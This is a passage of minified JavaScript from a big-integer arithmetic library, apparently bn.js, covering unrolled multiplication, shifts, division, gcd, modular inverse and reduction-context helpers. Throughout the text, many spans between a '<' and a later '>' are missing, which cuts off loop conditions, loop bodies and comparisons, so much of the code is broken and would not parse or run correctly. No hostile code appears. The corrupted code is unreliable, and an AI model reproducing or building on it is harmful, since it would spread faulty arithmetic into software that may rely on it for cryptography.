G=0,X=0;X>26,this.words[X]=67108863&f;for(;0!==G&&X>26,this.words[X]=67108863&f;if(0===G&&X>>13,Ie=0|M[1],Ae=8191&Ie,Ue=Ie>>>13,Xe=0|M[2],He=8191&Xe,Be=Xe>>>13,qe=0|M[3],De=8191&qe,Ve=qe>>>13,ze=0|M[4],me=8191&ze,Ke=ze>>>13,rt=0|M[5],Ge=8191&rt,Qe=rt>>>13,ht=0|M[6],mt=8191&ht,lt=ht>>>13,ft=0|M[7],xe=8191&ft,We=ft>>>13,Je=0|M[8],Oe=8191&Je,Te=Je>>>13,Le=0|M[9],$e=8191&Le,st=Le>>>13,xt=0|P[0],pt=8191&xt,vt=xt>>>13,Wi=0|P[1],Ft=8191&Wi,zt=Wi>>>13,pa=0|P[2],Jt=8191&pa,Gt=pa>>>13,Co=0|P[3],jt=8191&Co,qt=Co>>>13,Qn=0|P[4],Kt=8191&Qn,Zt=Qn>>>13,Bo=0|P[5],ti=8191&Bo,ii=Bo>>>13,pn=0|P[6],Pt=8191&pn,Xt=pn>>>13,Ho=0|P[7],Qt=8191&Ho,ei=Ho>>>13,$o=0|P[8],ai=8191&$o,$t=$o>>>13,zo=0|P[9],Ut=8191&zo,Yt=zo>>>13;v.negative=l.negative^f.negative,v.length=19;var ha=(X+(L=Math.imul(Z,pt))|0)+((8191&(h=(h=Math.imul(Z,vt))+Math.imul(ue,pt)|0))<<13)|0;X=((R=Math.imul(ue,vt))+(h>>>13)|0)+(ha>>>26)|0,ha&=67108863,L=Math.imul(Ae,pt),h=(h=Math.imul(Ae,vt))+Math.imul(Ue,pt)|0,R=Math.imul(Ue,vt);var Ha=(X+(L=L+Math.imul(Z,Ft)|0)|0)+((8191&(h=(h=h+Math.imul(Z,zt)|0)+Math.imul(ue,Ft)|0))<<13)|0;X=((R=R+Math.imul(ue,zt)|0)+(h>>>13)|0)+(Ha>>>26)|0,Ha&=67108863,L=Math.imul(He,pt),h=(h=Math.imul(He,vt))+Math.imul(Be,pt)|0,R=Math.imul(Be,vt),L=L+Math.imul(Ae,Ft)|0,h=(h=h+Math.imul(Ae,zt)|0)+Math.imul(Ue,Ft)|0,R=R+Math.imul(Ue,zt)|0;var Va=(X+(L=L+Math.imul(Z,Jt)|0)|0)+((8191&(h=(h=h+Math.imul(Z,Gt)|0)+Math.imul(ue,Jt)|0))<<13)|0;X=((R=R+Math.imul(ue,Gt)|0)+(h>>>13)|0)+(Va>>>26)|0,Va&=67108863,L=Math.imul(De,pt),h=(h=Math.imul(De,vt))+Math.imul(Ve,pt)|0,R=Math.imul(Ve,vt),L=L+Math.imul(He,Ft)|0,h=(h=h+Math.imul(He,zt)|0)+Math.imul(Be,Ft)|0,R=R+Math.imul(Be,zt)|0,L=L+Math.imul(Ae,Jt)|0,h=(h=h+Math.imul(Ae,Gt)|0)+Math.imul(Ue,Jt)|0,R=R+Math.imul(Ue,Gt)|0;var co=(X+(L=L+Math.imul(Z,jt)|0)|0)+((8191&(h=(h=h+Math.imul(Z,qt)|0)+Math.imul(ue,jt)|0))<<13)|0;X=((R=R+Math.imul(ue,qt)|0)+(h>>>13)|0)+(co>>>26)|0,co&=67108863,L=Math.imul(me,pt),h=(h=Math.imul(me,vt))+Math.imul(Ke,pt)|0,R=Math.imul(Ke,vt),L=L+Math.imul(De,Ft)|0,h=(h=h+Math.imul(De,zt)|0)+Math.imul(Ve,Ft)|0,R=R+Math.imul(Ve,zt)|0,L=L+Math.imul(He,Jt)|0,h=(h=h+Math.imul(He,Gt)|0)+Math.imul(Be,Jt)|0,R=R+Math.imul(Be,Gt)|0,L=L+Math.imul(Ae,jt)|0,h=(h=h+Math.imul(Ae,qt)|0)+Math.imul(Ue,jt)|0,R=R+Math.imul(Ue,qt)|0;var io=(X+(L=L+Math.imul(Z,Kt)|0)|0)+((8191&(h=(h=h+Math.imul(Z,Zt)|0)+Math.imul(ue,Kt)|0))<<13)|0;X=((R=R+Math.imul(ue,Zt)|0)+(h>>>13)|0)+(io>>>26)|0,io&=67108863,L=Math.imul(Ge,pt),h=(h=Math.imul(Ge,vt))+Math.imul(Qe,pt)|0,R=Math.imul(Qe,vt),L=L+Math.imul(me,Ft)|0,h=(h=h+Math.imul(me,zt)|0)+Math.imul(Ke,Ft)|0,R=R+Math.imul(Ke,zt)|0,L=L+Math.imul(De,Jt)|0,h=(h=h+Math.imul(De,Gt)|0)+Math.imul(Ve,Jt)|0,R=R+Math.imul(Ve,Gt)|0,L=L+Math.imul(He,jt)|0,h=(h=h+Math.imul(He,qt)|0)+Math.imul(Be,jt)|0,R=R+Math.imul(Be,qt)|0,L=L+Math.imul(Ae,Kt)|0,h=(h=h+Math.imul(Ae,Zt)|0)+Math.imul(Ue,Kt)|0,R=R+Math.imul(Ue,Zt)|0;var yo=(X+(L=L+Math.imul(Z,ti)|0)|0)+((8191&(h=(h=h+Math.imul(Z,ii)|0)+Math.imul(ue,ti)|0))<<13)|0;X=((R=R+Math.imul(ue,ii)|0)+(h>>>13)|0)+(yo>>>26)|0,yo&=67108863,L=Math.imul(mt,pt),h=(h=Math.imul(mt,vt))+Math.imul(lt,pt)|0,R=Math.imul(lt,vt),L=L+Math.imul(Ge,Ft)|0,h=(h=h+Math.imul(Ge,zt)|0)+Math.imul(Qe,Ft)|0,R=R+Math.imul(Qe,zt)|0,L=L+Math.imul(me,Jt)|0,h=(h=h+Math.imul(me,Gt)|0)+Math.imul(Ke,Jt)|0,R=R+Math.imul(Ke,Gt)|0,L=L+Math.imul(De,jt)|0,h=(h=h+Math.imul(De,qt)|0)+Math.imul(Ve,jt)|0,R=R+Math.imul(Ve,qt)|0,L=L+Math.imul(He,Kt)|0,h=(h=h+Math.imul(He,Zt)|0)+Math.imul(Be,Kt)|0,R=R+Math.imul(Be,Zt)|0,L=L+Math.imul(Ae,ti)|0,h=(h=h+Math.imul(Ae,ii)|0)+Math.imul(Ue,ti)|0,R=R+Math.imul(Ue,ii)|0;var Vn=(X+(L=L+Math.imul(Z,Pt)|0)|0)+((8191&(h=(h=h+Math.imul(Z,Xt)|0)+Math.imul(ue,Pt)|0))<<13)|0;X=((R=R+Math.imul(ue,Xt)|0)+(h>>>13)|0)+(Vn>>>26)|0,Vn&=67108863,L=Math.imul(xe,pt),h=(h=Math.imul(xe,vt))+Math.imul(We,pt)|0,R=Math.imul(We,vt),L=L+Math.imul(mt,Ft)|0,h=(h=h+Math.imul(mt,zt)|0)+Math.imul(lt,Ft)|0,R=R+Math.imul(lt,zt)|0,L=L+Math.imul(Ge,Jt)|0,h=(h=h+Math.imul(Ge,Gt)|0)+Math.imul(Qe,Jt)|0,R=R+Math.imul(Qe,Gt)|0,L=L+Math.imul(me,jt)|0,h=(h=h+Math.imul(me,qt)|0)+Math.imul(Ke,jt)|0,R=R+Math.imul(Ke,qt)|0,L=L+Math.imul(De,Kt)|0,h=(h=h+Math.imul(De,Zt)|0)+Math.imul(Ve,Kt)|0,R=R+Math.imul(Ve,Zt)|0,L=L+Math.imul(He,ti)|0,h=(h=h+Math.imul(He,ii)|0)+Math.imul(Be,ti)|0,R=R+Math.imul(Be,ii)|0,L=L+Math.imul(Ae,Pt)|0,h=(h=h+Math.imul(Ae,Xt)|0)+Math.imul(Ue,Pt)|0,R=R+Math.imul(Ue,Xt)|0;var Eo=(X+(L=L+Math.imul(Z,Qt)|0)|0)+((8191&(h=(h=h+Math.imul(Z,ei)|0)+Math.imul(ue,Qt)|0))<<13)|0;X=((R=R+Math.imul(ue,ei)|0)+(h>>>13)|0)+(Eo>>>26)|0,Eo&=67108863,L=Math.imul(Oe,pt),h=(h=Math.imul(Oe,vt))+Math.imul(Te,pt)|0,R=Math.imul(Te,vt),L=L+Math.imul(xe,Ft)|0,h=(h=h+Math.imul(xe,zt)|0)+Math.imul(We,Ft)|0,R=R+Math.imul(We,zt)|0,L=L+Math.imul(mt,Jt)|0,h=(h=h+Math.imul(mt,Gt)|0)+Math.imul(lt,Jt)|0,R=R+Math.imul(lt,Gt)|0,L=L+Math.imul(Ge,jt)|0,h=(h=h+Math.imul(Ge,qt)|0)+Math.imul(Qe,jt)|0,R=R+Math.imul(Qe,qt)|0,L=L+Math.imul(me,Kt)|0,h=(h=h+Math.imul(me,Zt)|0)+Math.imul(Ke,Kt)|0,R=R+Math.imul(Ke,Zt)|0,L=L+Math.imul(De,ti)|0,h=(h=h+Math.imul(De,ii)|0)+Math.imul(Ve,ti)|0,R=R+Math.imul(Ve,ii)|0,L=L+Math.imul(He,Pt)|0,h=(h=h+Math.imul(He,Xt)|0)+Math.imul(Be,Pt)|0,R=R+Math.imul(Be,Xt)|0,L=L+Math.imul(Ae,Qt)|0,h=(h=h+Math.imul(Ae,ei)|0)+Math.imul(Ue,Qt)|0,R=R+Math.imul(Ue,ei)|0;var Pn=(X+(L=L+Math.imul(Z,ai)|0)|0)+((8191&(h=(h=h+Math.imul(Z,$t)|0)+Math.imul(ue,ai)|0))<<13)|0;X=((R=R+Math.imul(ue,$t)|0)+(h>>>13)|0)+(Pn>>>26)|0,Pn&=67108863,L=Math.imul($e,pt),h=(h=Math.imul($e,vt))+Math.imul(st,pt)|0,R=Math.imul(st,vt),L=L+Math.imul(Oe,Ft)|0,h=(h=h+Math.imul(Oe,zt)|0)+Math.imul(Te,Ft)|0,R=R+Math.imul(Te,zt)|0,L=L+Math.imul(xe,Jt)|0,h=(h=h+Math.imul(xe,Gt)|0)+Math.imul(We,Jt)|0,R=R+Math.imul(We,Gt)|0,L=L+Math.imul(mt,jt)|0,h=(h=h+Math.imul(mt,qt)|0)+Math.imul(lt,jt)|0,R=R+Math.imul(lt,qt)|0,L=L+Math.imul(Ge,Kt)|0,h=(h=h+Math.imul(Ge,Zt)|0)+Math.imul(Qe,Kt)|0,R=R+Math.imul(Qe,Zt)|0,L=L+Math.imul(me,ti)|0,h=(h=h+Math.imul(me,ii)|0)+Math.imul(Ke,ti)|0,R=R+Math.imul(Ke,ii)|0,L=L+Math.imul(De,Pt)|0,h=(h=h+Math.imul(De,Xt)|0)+Math.imul(Ve,Pt)|0,R=R+Math.imul(Ve,Xt)|0,L=L+Math.imul(He,Qt)|0,h=(h=h+Math.imul(He,ei)|0)+Math.imul(Be,Qt)|0,R=R+Math.imul(Be,ei)|0,L=L+Math.imul(Ae,ai)|0,h=(h=h+Math.imul(Ae,$t)|0)+Math.imul(Ue,ai)|0,R=R+Math.imul(Ue,$t)|0;var lo=(X+(L=L+Math.imul(Z,Ut)|0)|0)+((8191&(h=(h=h+Math.imul(Z,Yt)|0)+Math.imul(ue,Ut)|0))<<13)|0;X=((R=R+Math.imul(ue,Yt)|0)+(h>>>13)|0)+(lo>>>26)|0,lo&=67108863,L=Math.imul($e,Ft),h=(h=Math.imul($e,zt))+Math.imul(st,Ft)|0,R=Math.imul(st,zt),L=L+Math.imul(Oe,Jt)|0,h=(h=h+Math.imul(Oe,Gt)|0)+Math.imul(Te,Jt)|0,R=R+Math.imul(Te,Gt)|0,L=L+Math.imul(xe,jt)|0,h=(h=h+Math.imul(xe,qt)|0)+Math.imul(We,jt)|0,R=R+Math.imul(We,qt)|0,L=L+Math.imul(mt,Kt)|0,h=(h=h+Math.imul(mt,Zt)|0)+Math.imul(lt,Kt)|0,R=R+Math.imul(lt,Zt)|0,L=L+Math.imul(Ge,ti)|0,h=(h=h+Math.imul(Ge,ii)|0)+Math.imul(Qe,ti)|0,R=R+Math.imul(Qe,ii)|0,L=L+Math.imul(me,Pt)|0,h=(h=h+Math.imul(me,Xt)|0)+Math.imul(Ke,Pt)|0,R=R+Math.imul(Ke,Xt)|0,L=L+Math.imul(De,Qt)|0,h=(h=h+Math.imul(De,ei)|0)+Math.imul(Ve,Qt)|0,R=R+Math.imul(Ve,ei)|0,L=L+Math.imul(He,ai)|0,h=(h=h+Math.imul(He,$t)|0)+Math.imul(Be,ai)|0,R=R+Math.imul(Be,$t)|0;var ao=(X+(L=L+Math.imul(Ae,Ut)|0)|0)+((8191&(h=(h=h+Math.imul(Ae,Yt)|0)+Math.imul(Ue,Ut)|0))<<13)|0;X=((R=R+Math.imul(Ue,Yt)|0)+(h>>>13)|0)+(ao>>>26)|0,ao&=67108863,L=Math.imul($e,Jt),h=(h=Math.imul($e,Gt))+Math.imul(st,Jt)|0,R=Math.imul(st,Gt),L=L+Math.imul(Oe,jt)|0,h=(h=h+Math.imul(Oe,qt)|0)+Math.imul(Te,jt)|0,R=R+Math.imul(Te,qt)|0,L=L+Math.imul(xe,Kt)|0,h=(h=h+Math.imul(xe,Zt)|0)+Math.imul(We,Kt)|0,R=R+Math.imul(We,Zt)|0,L=L+Math.imul(mt,ti)|0,h=(h=h+Math.imul(mt,ii)|0)+Math.imul(lt,ti)|0,R=R+Math.imul(lt,ii)|0,L=L+Math.imul(Ge,Pt)|0,h=(h=h+Math.imul(Ge,Xt)|0)+Math.imul(Qe,Pt)|0,R=R+Math.imul(Qe,Xt)|0,L=L+Math.imul(me,Qt)|0,h=(h=h+Math.imul(me,ei)|0)+Math.imul(Ke,Qt)|0,R=R+Math.imul(Ke,ei)|0,L=L+Math.imul(De,ai)|0,h=(h=h+Math.imul(De,$t)|0)+Math.imul(Ve,ai)|0,R=R+Math.imul(Ve,$t)|0;var bo=(X+(L=L+Math.imul(He,Ut)|0)|0)+((8191&(h=(h=h+Math.imul(He,Yt)|0)+Math.imul(Be,Ut)|0))<<13)|0;X=((R=R+Math.imul(Be,Yt)|0)+(h>>>13)|0)+(bo>>>26)|0,bo&=67108863,L=Math.imul($e,jt),h=(h=Math.imul($e,qt))+Math.imul(st,jt)|0,R=Math.imul(st,qt),L=L+Math.imul(Oe,Kt)|0,h=(h=h+Math.imul(Oe,Zt)|0)+Math.imul(Te,Kt)|0,R=R+Math.imul(Te,Zt)|0,L=L+Math.imul(xe,ti)|0,h=(h=h+Math.imul(xe,ii)|0)+Math.imul(We,ti)|0,R=R+Math.imul(We,ii)|0,L=L+Math.imul(mt,Pt)|0,h=(h=h+Math.imul(mt,Xt)|0)+Math.imul(lt,Pt)|0,R=R+Math.imul(lt,Xt)|0,L=L+Math.imul(Ge,Qt)|0,h=(h=h+Math.imul(Ge,ei)|0)+Math.imul(Qe,Qt)|0,R=R+Math.imul(Qe,ei)|0,L=L+Math.imul(me,ai)|0,h=(h=h+Math.imul(me,$t)|0)+Math.imul(Ke,ai)|0,R=R+Math.imul(Ke,$t)|0;var $n=(X+(L=L+Math.imul(De,Ut)|0)|0)+((8191&(h=(h=h+Math.imul(De,Yt)|0)+Math.imul(Ve,Ut)|0))<<13)|0;X=((R=R+Math.imul(Ve,Yt)|0)+(h>>>13)|0)+($n>>>26)|0,$n&=67108863,L=Math.imul($e,Kt),h=(h=Math.imul($e,Zt))+Math.imul(st,Kt)|0,R=Math.imul(st,Zt),L=L+Math.imul(Oe,ti)|0,h=(h=h+Math.imul(Oe,ii)|0)+Math.imul(Te,ti)|0,R=R+Math.imul(Te,ii)|0,L=L+Math.imul(xe,Pt)|0,h=(h=h+Math.imul(xe,Xt)|0)+Math.imul(We,Pt)|0,R=R+Math.imul(We,Xt)|0,L=L+Math.imul(mt,Qt)|0,h=(h=h+Math.imul(mt,ei)|0)+Math.imul(lt,Qt)|0,R=R+Math.imul(lt,ei)|0,L=L+Math.imul(Ge,ai)|0,h=(h=h+Math.imul(Ge,$t)|0)+Math.imul(Qe,ai)|0,R=R+Math.imul(Qe,$t)|0;var Do=(X+(L=L+Math.imul(me,Ut)|0)|0)+((8191&(h=(h=h+Math.imul(me,Yt)|0)+Math.imul(Ke,Ut)|0))<<13)|0;X=((R=R+Math.imul(Ke,Yt)|0)+(h>>>13)|0)+(Do>>>26)|0,Do&=67108863,L=Math.imul($e,ti),h=(h=Math.imul($e,ii))+Math.imul(st,ti)|0,R=Math.imul(st,ii),L=L+Math.imul(Oe,Pt)|0,h=(h=h+Math.imul(Oe,Xt)|0)+Math.imul(Te,Pt)|0,R=R+Math.imul(Te,Xt)|0,L=L+Math.imul(xe,Qt)|0,h=(h=h+Math.imul(xe,ei)|0)+Math.imul(We,Qt)|0,R=R+Math.imul(We,ei)|0,L=L+Math.imul(mt,ai)|0,h=(h=h+Math.imul(mt,$t)|0)+Math.imul(lt,ai)|0,R=R+Math.imul(lt,$t)|0;var Mo=(X+(L=L+Math.imul(Ge,Ut)|0)|0)+((8191&(h=(h=h+Math.imul(Ge,Yt)|0)+Math.imul(Qe,Ut)|0))<<13)|0;X=((R=R+Math.imul(Qe,Yt)|0)+(h>>>13)|0)+(Mo>>>26)|0,Mo&=67108863,L=Math.imul($e,Pt),h=(h=Math.imul($e,Xt))+Math.imul(st,Pt)|0,R=Math.imul(st,Xt),L=L+Math.imul(Oe,Qt)|0,h=(h=h+Math.imul(Oe,ei)|0)+Math.imul(Te,Qt)|0,R=R+Math.imul(Te,ei)|0,L=L+Math.imul(xe,ai)|0,h=(h=h+Math.imul(xe,$t)|0)+Math.imul(We,ai)|0,R=R+Math.imul(We,$t)|0;var no=(X+(L=L+Math.imul(mt,Ut)|0)|0)+((8191&(h=(h=h+Math.imul(mt,Yt)|0)+Math.imul(lt,Ut)|0))<<13)|0;X=((R=R+Math.imul(lt,Yt)|0)+(h>>>13)|0)+(no>>>26)|0,no&=67108863,L=Math.imul($e,Qt),h=(h=Math.imul($e,ei))+Math.imul(st,Qt)|0,R=Math.imul(st,ei),L=L+Math.imul(Oe,ai)|0,h=(h=h+Math.imul(Oe,$t)|0)+Math.imul(Te,ai)|0,R=R+Math.imul(Te,$t)|0;var Kn=(X+(L=L+Math.imul(xe,Ut)|0)|0)+((8191&(h=(h=h+Math.imul(xe,Yt)|0)+Math.imul(We,Ut)|0))<<13)|0;X=((R=R+Math.imul(We,Yt)|0)+(h>>>13)|0)+(Kn>>>26)|0,Kn&=67108863,L=Math.imul($e,ai),h=(h=Math.imul($e,$t))+Math.imul(st,ai)|0,R=Math.imul(st,$t);var Sa=(X+(L=L+Math.imul(Oe,Ut)|0)|0)+((8191&(h=(h=h+Math.imul(Oe,Yt)|0)+Math.imul(Te,Ut)|0))<<13)|0;X=((R=R+Math.imul(Te,Yt)|0)+(h>>>13)|0)+(Sa>>>26)|0,Sa&=67108863;var ra=(X+(L=Math.imul($e,Ut))|0)+((8191&(h=(h=Math.imul($e,Yt))+Math.imul(st,Ut)|0))<<13)|0;return X=((R=Math.imul(st,Yt))+(h>>>13)|0)+(ra>>>26)|0,ra&=67108863,G[0]=ha,G[1]=Ha,G[2]=Va,G[3]=co,G[4]=io,G[5]=yo,G[6]=Vn,G[7]=Eo,G[8]=Pn,G[9]=lo,G[10]=ao,G[11]=bo,G[12]=$n,G[13]=Do,G[14]=Mo,G[15]=no,G[16]=Kn,G[17]=Sa,G[18]=ra,0!==X&&(G[19]=X,v.length++),v};function x(z,l,f){return(new S).mulp(z,l,f)}function S(z,l){this.x=z,this.y=l}Math.imul||(D=p),I.prototype.mulTo=function(l,f){var v,M=this.length+l.length;return v=10===this.length&&10===l.length?D(this,l,f):M<63?p(this,l,f):M<1024?function w(z,l,f){f.negative=l.negative^z.negative,f.length=z.length+l.length;for(var v=0,M=0,P=0;P>>26)|0)>>>26,G&=67108863}f.words[P]=X,v=G,G=M}return 0!==v?f.words[P]=v:f.length--,f.strip()}(this,l,f):x(this,l,f),v},S.prototype.makeRBT=function(l){for(var f=new Array(l),v=I.prototype._countBits(l)-1,M=0;M>=1;return M},S.prototype.permute=function(l,f,v,M,P,G){for(var X=0;X>>=1)P++;return 1<>>=13),P>>>=13;for(G=2*f;G>=26,f+=M/67108864|0,f+=P>>>26,this.words[v]=67108863&P}return 0!==f&&(this.words[v]=f,this.length++),this},I.prototype.muln=function(l){return this.clone().imuln(l)},I.prototype.sqr=function(){return this.mul(this)},I.prototype.isqr=function(){return this.imul(this.clone())},I.prototype.pow=function(l){var f=function A(z){for(var l=new Array(z.bitLength()),f=0;f>>M}return l}(l);if(0===f.length)return new I(1);for(var v=this,M=0;M=0);var P,f=l%26,v=(l-f)/26,M=67108863>>>26-f<<26-f;if(0!==f){var G=0;for(P=0;P>>26-f}G&&(this.words[P]=G,this.length++)}if(0!==v){for(P=this.length-1;P>=0;P--)this.words[P+v]=this.words[P];for(P=0;P=0),M=f?(f-f%26)/26:0;var P=l%26,G=Math.min((l-P)/26,this.length),X=67108863^67108863>>>P<G)for(this.length-=G,h=0;h=0&&(0!==R||h>=M);h--){var J=0|this.words[h];this.words[h]=R<<26-P|J>>>P,R=J&X}return L&&0!==R&&(L.words[L.length++]=R),0===this.length&&(this.words[0]=0,this.length=1),this.strip()},I.prototype.ishrn=function(l,f,v){return Q(0===this.negative),this.iushrn(l,f,v)},I.prototype.shln=function(l){return this.clone().ishln(l)},I.prototype.ushln=function(l){return this.clone().iushln(l)},I.prototype.shrn=function(l){return this.clone().ishrn(l)},I.prototype.ushrn=function(l){return this.clone().iushrn(l)},I.prototype.testn=function(l){Q("number"==typeof l&&l>=0);var f=l%26,v=(l-f)/26;return!(this.length<=v||!(this.words[v]&1<=0);var f=l%26,v=(l-f)/26;return Q(0===this.negative,"imaskn works only with positive numbers"),this.length<=v?this:(0!==f&&v++,this.length=Math.min(v,this.length),0!==f&&(this.words[this.length-1]&=67108863^67108863>>>f<=67108864;f++)this.words[f]-=67108864,f===this.length-1?this.words[f+1]=1:this.words[f+1]++;return this.length=Math.max(this.length,f+1),this},I.prototype.isubn=function(l){if(Q("number"==typeof l),Q(l<67108864),l<0)return this.iaddn(-l);if(0!==this.negative)return this.negative=0,this.iaddn(l),this.negative=1,this;if(this.words[0]-=l,1===this.length&&this.words[0]<0)this.words[0]=-this.words[0],this.negative=1;else for(var f=0;f>26)-(L/67108864|0),this.words[P+v]=67108863&G}for(;P>26,this.words[P+v]=67108863&G;if(0===X)return this.strip();for(Q(-1===X),X=0,P=0;P>26,this.words[P]=67108863&G;return this.negative=1,this.strip()},I.prototype._wordDiv=function(l,f){var v,M=this.clone(),P=l,G=0|P.words[P.length-1];0!=(v=26-this._countBits(G))&&(P=P.ushln(v),M.iushln(v),G=0|P.words[P.length-1]);var h,L=M.length-P.length;if("mod"!==f){(h=new I(null)).length=L+1,h.words=new Array(h.length);for(var R=0;R=0;Z--){var ue=67108864*(0|M.words[P.length+Z])+(0|M.words[P.length+Z-1]);for(ue=Math.min(ue/G|0,67108863),M._ishlnsubmul(P,ue,Z);0!==M.negative;)ue--,M.negative=0,M._ishlnsubmul(P,1,Z),M.isZero()||(M.negative^=1);h&&(h.words[Z]=ue)}return h&&h.strip(),M.strip(),"div"!==f&&0!==v&&M.iushrn(v),{div:h||null,mod:M}},I.prototype.divmod=function(l,f,v){return Q(!l.isZero()),this.isZero()?{div:new I(0),mod:new I(0)}:0!==this.negative&&0===l.negative?(G=this.neg().divmod(l,f),"mod"!==f&&(M=G.div.neg()),"div"!==f&&(P=G.mod.neg(),v&&0!==P.negative&&P.iadd(l)),{div:M,mod:P}):0===this.negative&&0!==l.negative?(G=this.divmod(l.neg(),f),"mod"!==f&&(M=G.div.neg()),{div:M,mod:G.mod}):0!=(this.negative&l.negative)?(G=this.neg().divmod(l.neg(),f),"div"!==f&&(P=G.mod.neg(),v&&0!==P.negative&&P.isub(l)),{div:G.div,mod:P}):l.length>this.length||this.cmp(l)<0?{div:new I(0),mod:this}:1===l.length?"div"===f?{div:this.divn(l.words[0]),mod:null}:"mod"===f?{div:null,mod:new I(this.modn(l.words[0]))}:{div:this.divn(l.words[0]),mod:new I(this.modn(l.words[0]))}:this._wordDiv(l,f);var M,P,G},I.prototype.div=function(l){return this.divmod(l,"div",!1).div},I.prototype.mod=function(l){return this.divmod(l,"mod",!1).mod},I.prototype.umod=function(l){return this.divmod(l,"mod",!0).mod},I.prototype.divRound=function(l){var f=this.divmod(l);if(f.mod.isZero())return f.div;var v=0!==f.div.negative?f.mod.isub(l):f.mod,M=l.ushrn(1),P=l.andln(1),G=v.cmp(M);return G<0||1===P&&0===G?f.div:0!==f.div.negative?f.div.isubn(1):f.div.iaddn(1)},I.prototype.modn=function(l){Q(l<=67108863);for(var f=(1<<26)%l,v=0,M=this.length-1;M>=0;M--)v=(f*v+(0|this.words[M]))%l;return v},I.prototype.idivn=function(l){Q(l<=67108863);for(var f=0,v=this.length-1;v>=0;v--){var M=(0|this.words[v])+67108864*f;this.words[v]=M/l|0,f=M%l}return this.strip()},I.prototype.divn=function(l){return this.clone().idivn(l)},I.prototype.egcd=function(l){Q(0===l.negative),Q(!l.isZero());var f=this,v=l.clone();f=0!==f.negative?f.umod(l):f.clone();for(var M=new I(1),P=new I(0),G=new I(0),X=new I(1),L=0;f.isEven()&&v.isEven();)f.iushrn(1),v.iushrn(1),++L;for(var h=v.clone(),R=f.clone();!f.isZero();){for(var J=0,Z=1;0==(f.words[0]&Z)&&J<26;++J,Z<<=1);if(J>0)for(f.iushrn(J);J-- >0;)(M.isOdd()||P.isOdd())&&(M.iadd(h),P.isub(R)),M.iushrn(1),P.iushrn(1);for(var ue=0,Ie=1;0==(v.words[0]&Ie)&&ue<26;++ue,Ie<<=1);if(ue>0)for(v.iushrn(ue);ue-- >0;)(G.isOdd()||X.isOdd())&&(G.iadd(h),X.isub(R)),G.iushrn(1),X.iushrn(1);f.cmp(v)>=0?(f.isub(v),M.isub(G),P.isub(X)):(v.isub(f),G.isub(M),X.isub(P))}return{a:G,b:X,gcd:v.iushln(L)}},I.prototype._invmp=function(l){Q(0===l.negative),Q(!l.isZero());var J,f=this,v=l.clone();f=0!==f.negative?f.umod(l):f.clone();for(var M=new I(1),P=new I(0),G=v.clone();f.cmpn(1)>0&&v.cmpn(1)>0;){for(var X=0,L=1;0==(f.words[0]&L)&&X<26;++X,L<<=1);if(X>0)for(f.iushrn(X);X-- >0;)M.isOdd()&&M.iadd(G),M.iushrn(1);for(var h=0,R=1;0==(v.words[0]&R)&&h<26;++h,R<<=1);if(h>0)for(v.iushrn(h);h-- >0;)P.isOdd()&&P.iadd(G),P.iushrn(1);f.cmp(v)>=0?(f.isub(v),M.isub(P)):(v.isub(f),P.isub(M))}return(J=0===f.cmpn(1)?M:P).cmpn(0)<0&&J.iadd(l),J},I.prototype.gcd=function(l){if(this.isZero())return l.abs();if(l.isZero())return this.abs();var f=this.clone(),v=l.clone();f.negative=0,v.negative=0;for(var M=0;f.isEven()&&v.isEven();M++)f.iushrn(1),v.iushrn(1);for(;;){for(;f.isEven();)f.iushrn(1);for(;v.isEven();)v.iushrn(1);var P=f.cmp(v);if(P<0){var G=f;f=v,v=G}else if(0===P||0===v.cmpn(1))break;f.isub(v)}return v.iushln(M)},I.prototype.invm=function(l){return this.egcd(l).a.umod(l)},I.prototype.isEven=function(){return 0==(1&this.words[0])},I.prototype.isOdd=function(){return 1==(1&this.words[0])},I.prototype.andln=function(l){return this.words[0]&l},I.prototype.bincn=function(l){Q("number"==typeof l);var f=l%26,v=(l-f)/26,M=1<>>26,this.words[G]=X&=67108863}return 0!==P&&(this.words[G]=P,this.length++),this},I.prototype.isZero=function(){return 1===this.length&&0===this.words[0]},I.prototype.cmpn=function(l){var v,f=l<0;if(0!==this.negative&&!f)return-1;if(0===this.negative&&f)return 1;if(this.strip(),this.length>1)v=1;else{f&&(l=-l),Q(l<=67108863,"Number is too big");var M=0|this.words[0];v=M===l?0:Ml.length)return 1;if(this.length=0;v--){var M=0|this.words[v],P=0|l.words[v];if(M!==P){MP&&(f=1);break}}return f},I.prototype.gtn=function(l){return 1===this.cmpn(l)},I.prototype.gt=function(l){return 1===this.cmp(l)},I.prototype.gten=function(l){return this.cmpn(l)>=0},I.prototype.gte=function(l){return this.cmp(l)>=0},I.prototype.ltn=function(l){return-1===this.cmpn(l)},I.prototype.lt=function(l){return-1===this.cmp(l)},I.prototype.lten=function(l){return this.cmpn(l)<=0},I.prototype.lte=function(l){return this.cmp(l)<=0},I.prototype.eqn=function(l){return 0===this.cmpn(l)},I.prototype.eq=function(l){return 0===this.cmp(l)},I.red=function(l){return new le(l)},I.prototype.toRed=function(l){return Q(!this.red,"Already a number in reduction context"),Q(0===this.negative,"red works only with positives"),l.convertTo(this)._forceRed(l)},I.prototype.fromRed=function(){return Q(this.red,"fromRed works only with numbers in reduction context"),this.red.convertFrom(this)},I.prototype._forceRed=function(l){return this.red=l,this},I.prototype.forceRed=function(l){return Q(!this.red,"Already a number in reduction context"),this._forceRed(l)},I.prototype.redAdd=function(l){return Q(this.red,"redAdd works only with red numbers"),this.red.add(this,l)},I.prototype.redIAdd=function(l){return Q(this.red,"redIAdd works only with red numbers"),this.red.iadd(this,l)},I.prototype.redSub=function(l){return Q(this.red,"redSub works only with red numbers"),this.red.sub(this,l)},I.prototype.redISub=function(l){return Q(this.red,"redISub works only with red numbers"),this.red.isub(this,l)},I.prototype.redShl=function(l){return Q(this.red,"redShl works only with red numbers"),this.red.shl(this,l)},I.prototype.redMul=function(l){return Q(this.red,"redMul works only with red numbers"),this.red._verify2(this,l),this.red.mul(this,l)},I.prototype.redIMul=function(l){return Q(this.red,"redMul works only with red numbers"),this.red._verify2(this,l),this.red.imul(this,l)},I.prototype.redSqr=function(){return Q(this.red,"redSqr works only with red numbers"),this.red._verify1(this),this.red.sqr(this)},I.prototype.redISqr=function(){return Q(this.red,"redISqr works only with red numbers"),this.red._verify1(this),this.red.isqr(this)},I.prototype.redSqrt=function(){return Q(this.red,"redSqrt works only with red numbers"),this.red._verify1(this),this.red.sqrt(this)},I.prototype.redInvm=function(){return Q(this.red,"redInvm works only with red numbers"),this.red._verify1(this),this.red.invm(this)},I.prototype.redNeg=function(){return Q(this.red,"redNeg works only with red numbers"),this.red._verify1(this),this.red.neg(this)},I.prototype.redPow=function(l){return 